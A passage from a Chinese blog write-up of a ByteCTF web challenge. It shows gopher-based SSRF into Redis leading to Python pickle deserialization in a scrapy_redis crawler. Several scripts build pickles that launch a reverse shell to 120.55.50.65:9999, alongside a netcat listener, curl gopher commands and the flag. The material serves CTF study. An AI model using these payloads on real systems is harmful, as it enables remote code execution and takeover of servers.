class="hljs-string">&#x27;byte_text&#x27;</span>] = base64.b64encode((response.text).encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br>        <span class="hljs-keyword">yield</span> byte_item<br><br></code></pre></td></tr></table></figure>

<p>可以看到是用 scrapy_redis 写的一个爬虫，功能即接收url，抓取其中的 url 链接然后爬取。</p>
<h2 id="Python反序列化"><a href="#Python反序列化" class="headerlink" title="Python反序列化"></a>Python反序列化</h2><p>文件基本读取完成，整理一下已知信息：（分析数据流，然后分析数据流中间危险函数）</p>
<ol>
<li>web 应用将任务传给redis，redis做为 broker（dumps）</li>
<li>爬虫从这个 broker 处获取任务，最后将任务的结果存入 mongodb，最基础的一套分布式应用架构（loads）。<br><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/AB748B08-5068-48EF-B8EC-536FEB650AAC.png" srcset="/img/loading.gif"><br>pickle 函数！！！Python 反序列化漏洞，目前可以确定漏洞类型为 Python 反序列化。</li>
</ol>
<p>题解的exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-comment"># exp1.py</span><br><br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> quote<br><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">exp</span>(<span class="hljs-params">object</span>):</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span><br>        s = <span class="hljs-string">&quot;&quot;&quot;python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;120.55.50.65&quot;,9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;&quot;&quot;&quot;</span><br>        <span class="hljs-keyword">return</span> (os.system, (s,))<br><br><br>test = str(pickle.dumps(exp()))<br>poc = test.replace(<span class="hljs-string">&quot;\n&quot;</span>,<span class="hljs-string">&#x27;\\n&#x27;</span>).replace(<span class="hljs-string">&quot;\&quot;&quot;</span>,<span class="hljs-string">&quot;\\\&quot;&quot;</span>)[<span class="hljs-number">2</span>:<span class="hljs-number">-1</span>]<br>poc =<span class="hljs-string">&#x27;gopher://172.20.0.7:6379/_&#x27;</span>+quote(<span class="hljs-string">&#x27;ZADD byte:requests 0 &quot;&#x27;</span>)+quote(poc)+quote(<span class="hljs-string">&#x27;&quot;&#x27;</span>)<br>print(poc)<br><br></code></pre></td></tr></table></figure>
<p>将其中的 vps 地址和端口改为自己的，在自己的服务器运行 nc -lvvp 9999，将生成的 payload 在 <a target="_blank" rel="noopener" href="http://101.200.50.18:30010/result?url=http://120.55.50.65/1.html">http://101.200.50.18:30010/result?url=http://120.55.50.65/1.html</a> 的 url= 之后，即可 get shell。<br><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/F195950B-B1C3-4F53-AEC0-E9502B8ED0AC.png" srcset="/img/loading.gif"><br>最后得到 flag 为 ByteCTF{59c9c566-1167-4f66-950e-043fe53a1db5}</p>
<h2 id="拆解exp"><a href="#拆解exp" class="headerlink" title="拆解exp"></a>拆解exp</h2><p>exp 中知识盲区太多。可以考虑整理过后基础补充吧（Nnn 大佬还提供一种思路——打 redis），整理后的 exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-comment"># exp2.py</span><br><br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> quote<br><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">exp</span>(<span class="hljs-params">object</span>):</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span><br>        s = <span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">            python -c  &#x27;import socket,subprocess,os;</span><br><span class="hljs-string">                        </span><br><span class="hljs-string">                        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</span><br><span class="hljs-string">                        s.connect((&quot;120.55.50.65&quot;,9999));</span><br><span class="hljs-string">                        os.dup2(s.fileno(),0);</span><br><span class="hljs-string">                        os.dup2(s.fileno(),1);</span><br><span class="hljs-string">                        os.dup2(s.fileno(),2);</span><br><span class="hljs-string">                        p=subprocess.call(</span><br><span class="hljs-string">                                            [&quot;/bin/sh&quot;,&quot;-i&quot;]</span><br><span class="hljs-string">                                          );</span><br><span class="hljs-string">                        &#x27;</span><br><span class="hljs-string">            &quot;&quot;&quot;</span><br>        <span class="hljs-keyword">return</span> (os.system, (s,))<br><br><br>test = str(pickle.dumps(exp()))<br>poc = test.replace(<span class="hljs-string">&quot;\n&quot;</span>,<span class="hljs-string">&#x27;\\n&#x27;</span>).replace(<span class="hljs-string">&quot;\&quot;&quot;</span>,<span class="hljs-string">&quot;\\\&quot;&quot;</span>)[<span class="hljs-number">2</span>:<span class="hljs-number">-1</span>]<br>poc =<span class="hljs-string">&#x27;gopher://172.20.0.7:6379/_&#x27;</span>+quote(<span class="hljs-string">&#x27;ZADD byte:requests 0 &quot;&#x27;</span>)+quote(poc)+quote(<span class="hljs-string">&#x27;&quot;&#x27;</span>)<br>print(poc)<br><br></code></pre></td></tr></table></figure>
<p>接下来就一点点分析这个 exp，然后自己尝试些 exp。</p>
<h3 id="python反弹shell"><a href="#python反弹shell" class="headerlink" title="python反弹shell"></a>python反弹shell</h3><p>我将那段 <code>__reduce__</code>中的代码在本地进行执行，测试 bash 命令的正确性。<br><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/DF0CABC7-4537-44C8-8289-28A1F9C990A2.png" srcset="/img/loading.gif"><br>从上图可以看出，经过整理后的 bash 命令不能执行，也就印证了 exp2 生成的 payload 无法反弹 shell。</p>
<p>在这里补了一下 Python 反弹 shell 的姿势。尝试使用自己的反弹 shell 脚本 反弹 shell。Python 反弹 shell 的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-keyword">import</span> os<br><br><br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>s.connect((<span class="hljs-string">&quot;120.55.50.65&quot;</span>, <span class="hljs-number">9999</span>))<br>os.dup2(s.fileno(), <span class="hljs-number">0</span>)<br>os.dup2(s.fileno(), <span class="hljs-number">1</span>)<br>os.dup2(s.fileno(), <span class="hljs-number">2</span>)<br>p = subprocess.call(<br>    [<span class="hljs-string">&quot;/bin/sh&quot;</span>, <span class="hljs-string">&quot;-i&quot;</span>]<br>)<br><br></code></pre></td></tr></table></figure>
<p>在 <a target="_blank" rel="noopener" href="http://www.onelinerizer.com/">one-lined python 官网</a>生成一行的 python，并合成成命令</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br>python -c &quot;(lambda <span class="hljs-strong">__g: [<span class="hljs-string">[[[(s.connect((&#x27;120.55.50.65&#x27;, 9999)), (os.dup2(s.fileno(), 0), (os.dup2(s.fileno(), 1), (os.dup2(s.fileno(), 2), [None for __g[&#x27;p&#x27;</span>] in [<span class="hljs-string">(subprocess.call([&#x27;/bin/sh&#x27;, &#x27;-i&#x27;</span>]))]][<span class="hljs-string">0</span>])[<span class="hljs-string">1</span>])[<span class="hljs-string">1</span>])[<span class="hljs-string">1</span>])[<span class="hljs-string">1</span>] for __</span>g[<span class="hljs-string">&#x27;s&#x27;</span>] in [<span class="hljs-string">(socket.socket(socket.AF_INET, socket.SOCK_STREAM))</span>]][<span class="hljs-string">0</span>] for <span class="hljs-strong">__g[<span class="hljs-string">&#x27;os&#x27;</span>] in [<span class="hljs-string">(__import__(&#x27;os&#x27;, __g, __g))</span>]][<span class="hljs-string">0</span>] for __</span>g[<span class="hljs-string">&#x27;subprocess&#x27;</span>] in [<span class="hljs-string">(__import__(&#x27;subprocess&#x27;, __g, __g))</span>]][<span class="hljs-string">0</span>] for <span class="hljs-strong">__g[<span class="hljs-string">&#x27;socket&#x27;</span>] in [<span class="hljs-string">(__import__(&#x27;socket&#x27;, __g, __g))</span>]][0])(globals())&quot;</span><br><span class="hljs-strong"></span><br></code></pre></td></tr></table></figure>
<p>将替换原 exp 中的 反弹 shell 脚本，得到脚本：（注意引号问题）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> quote<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">exp</span>(<span class="hljs-params">object</span>):</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span><br>        s = <span class="hljs-string">&quot;&quot;&quot;python -c \&quot;(lambda __g: [[[[(s.connect((&#x27;120.55.50.65&#x27;, 9999)), (os.dup2(s.fileno(), 0), (os.dup2(s.fileno(), 1), (os.dup2(s.fileno(), 2), [None for __g[&#x27;p&#x27;] in [(subprocess.call([&#x27;/bin/sh&#x27;, &#x27;-i&#x27;]))]][0])[1])[1])[1])[1] for __g[&#x27;s&#x27;] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[&#x27;os&#x27;] in [(__import__(&#x27;os&#x27;, __g, __g))]][0] for __g[&#x27;subprocess&#x27;] in [(__import__(&#x27;subprocess&#x27;, __g, __g))]][0] for __g[&#x27;socket&#x27;] in [(__import__(&#x27;socket&#x27;, __g, __g))]][0])(globals())\&quot;&quot;&quot;&quot;</span><br>        <span class="hljs-keyword">return</span> (os.system, (s,))<br><br>test = str(pickle.dumps(exp()))<br>poc = test.replace(<span class="hljs-string">&quot;\n&quot;</span>,<span class="hljs-string">&#x27;\\n&#x27;</span>).replace(<span class="hljs-string">&quot;\&quot;&quot;</span>,<span class="hljs-string">&quot;\\\&quot;&quot;</span>)[<span class="hljs-number">2</span>:<span class="hljs-number">-1</span>]<br>poc =<span class="hljs-string">&#x27;gopher://172.20.0.7:6379/_&#x27;</span>+quote(<span class="hljs-string">&#x27;ZADD byte:requests 0 &quot;&#x27;</span>)+quote(poc)+quote(<span class="hljs-string">&#x27;&quot;&#x27;</span>)<br>print(poc)<br><br></code></pre></td></tr></table></figure>

<h3 id="gopher协议"><a href="#gopher协议" class="headerlink" title="gopher协议"></a>gopher协议</h3><p>最后需要看懂 poc 的 前半部分，就是下面这一小块：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs dts"><br><span class="hljs-symbol">gopher:</span><span class="hljs-comment">//172.20.0.7:6379/_ZADD byte:requests 0 &quot;“</span><br><br></code></pre></td></tr></table></figure>
<p>在此之前先去补充了一下 gopher 和 redis 的基本用法。并且题解中提到通过观察源码可以知道 scrapy_redis 它会将request对象存入爬虫名:requests这样的有序列表中。这里我有 2 个问题：</p>
<ol>
<li>使用 gopher 协议可以向 redis 插入数据？可以在本地进行测试。</li>
<li>为什么在 result= 之后可以 SSRF？怎么进行测试？<br>使用下面的 url 在本地进行测试，确实可以获取到数据。<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><br><span class="hljs-comment"># 插入键和值</span><br><span class="hljs-attribute">curl</span> -v gopher://<span class="hljs-number">127.0.0.1:6379</span>/_set%<span class="hljs-number">20</span>runoobkey%<span class="hljs-number">20</span>redis<br><span class="hljs-comment"># 获取值</span><br><span class="hljs-attribute">curl</span> -v gopher://<span class="hljs-number">127.0.0.1:6379</span>/_get%<span class="hljs-number">20</span>runoobkey<br><br></code></pre></td></tr></table></figure>

</li>
</ol>
<p>通过前面读取源码，可以知道 host</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><br><span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>     localhost<br>::<span class="hljs-number">1</span>           localhost ip6-localhost ip6-loopback<br>fe00::<span class="hljs-number">0</span>       ip6-localnet<br>ff00::<span class="hljs-number">0</span>       ip6-mcastprefix<br>ff02::<span class="hljs-number">1</span>       ip6-allnodes<br>ff02::<span class="hljs-number">2</span>       ip6-allrouters<br><span class="hljs-number">172.20</span><span class="hljs-number">.0</span><span class="hljs-number">.5</span>    <span class="hljs-number">914</span>c062c7588<br><br></code></pre></td></tr></table></figure>
<p>整理一下所有 ip 的思路（只看后缀）</p>
<ol>
<li>setting.py 中有一个 .7 的 ip</li>
<li>pipelines.py 中有一个 .8 的 ip</li>
<li>host 中有 .5 的 ip<br>每个 ip 都对应一个 redis，参考这篇文章 <a target="_blank" rel="noopener" href="https://blog.csdn.net/zwq912318834/article/details/78854571">https://blog.csdn.net/zwq912318834/article/details/78854571</a> 可知，存在主从 redis。如何判断 主服务器的地址呢？为啥开始 exp 打 .7 的 ip 呢？</li>
</ol>
<p>这个题目已经补完了！最重要的思想已经 GET，每次补题都会补题时间过长。。导致很多题目没补完，这次也是。(还有可能是比较菜的原因-。-#)</p>
<hr>
<p>官方已经将环境关闭了，额，补不完了。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AE%89%E5%85%A8/">安全</a>
                    
                  </div>
                
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/31/2020%E5%B9%B410%E6%9C%8831%E6%97%A5-PDFCreator%E9%A2%98%E8%A7%A3/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">PDFCreator题解</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/17/2020%E5%B9%B410%E6%9C%8817%E6%97%A5-N1CTF/">
                        <span class="hidden-mobile">2020年10月N1CTF部分web题解</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
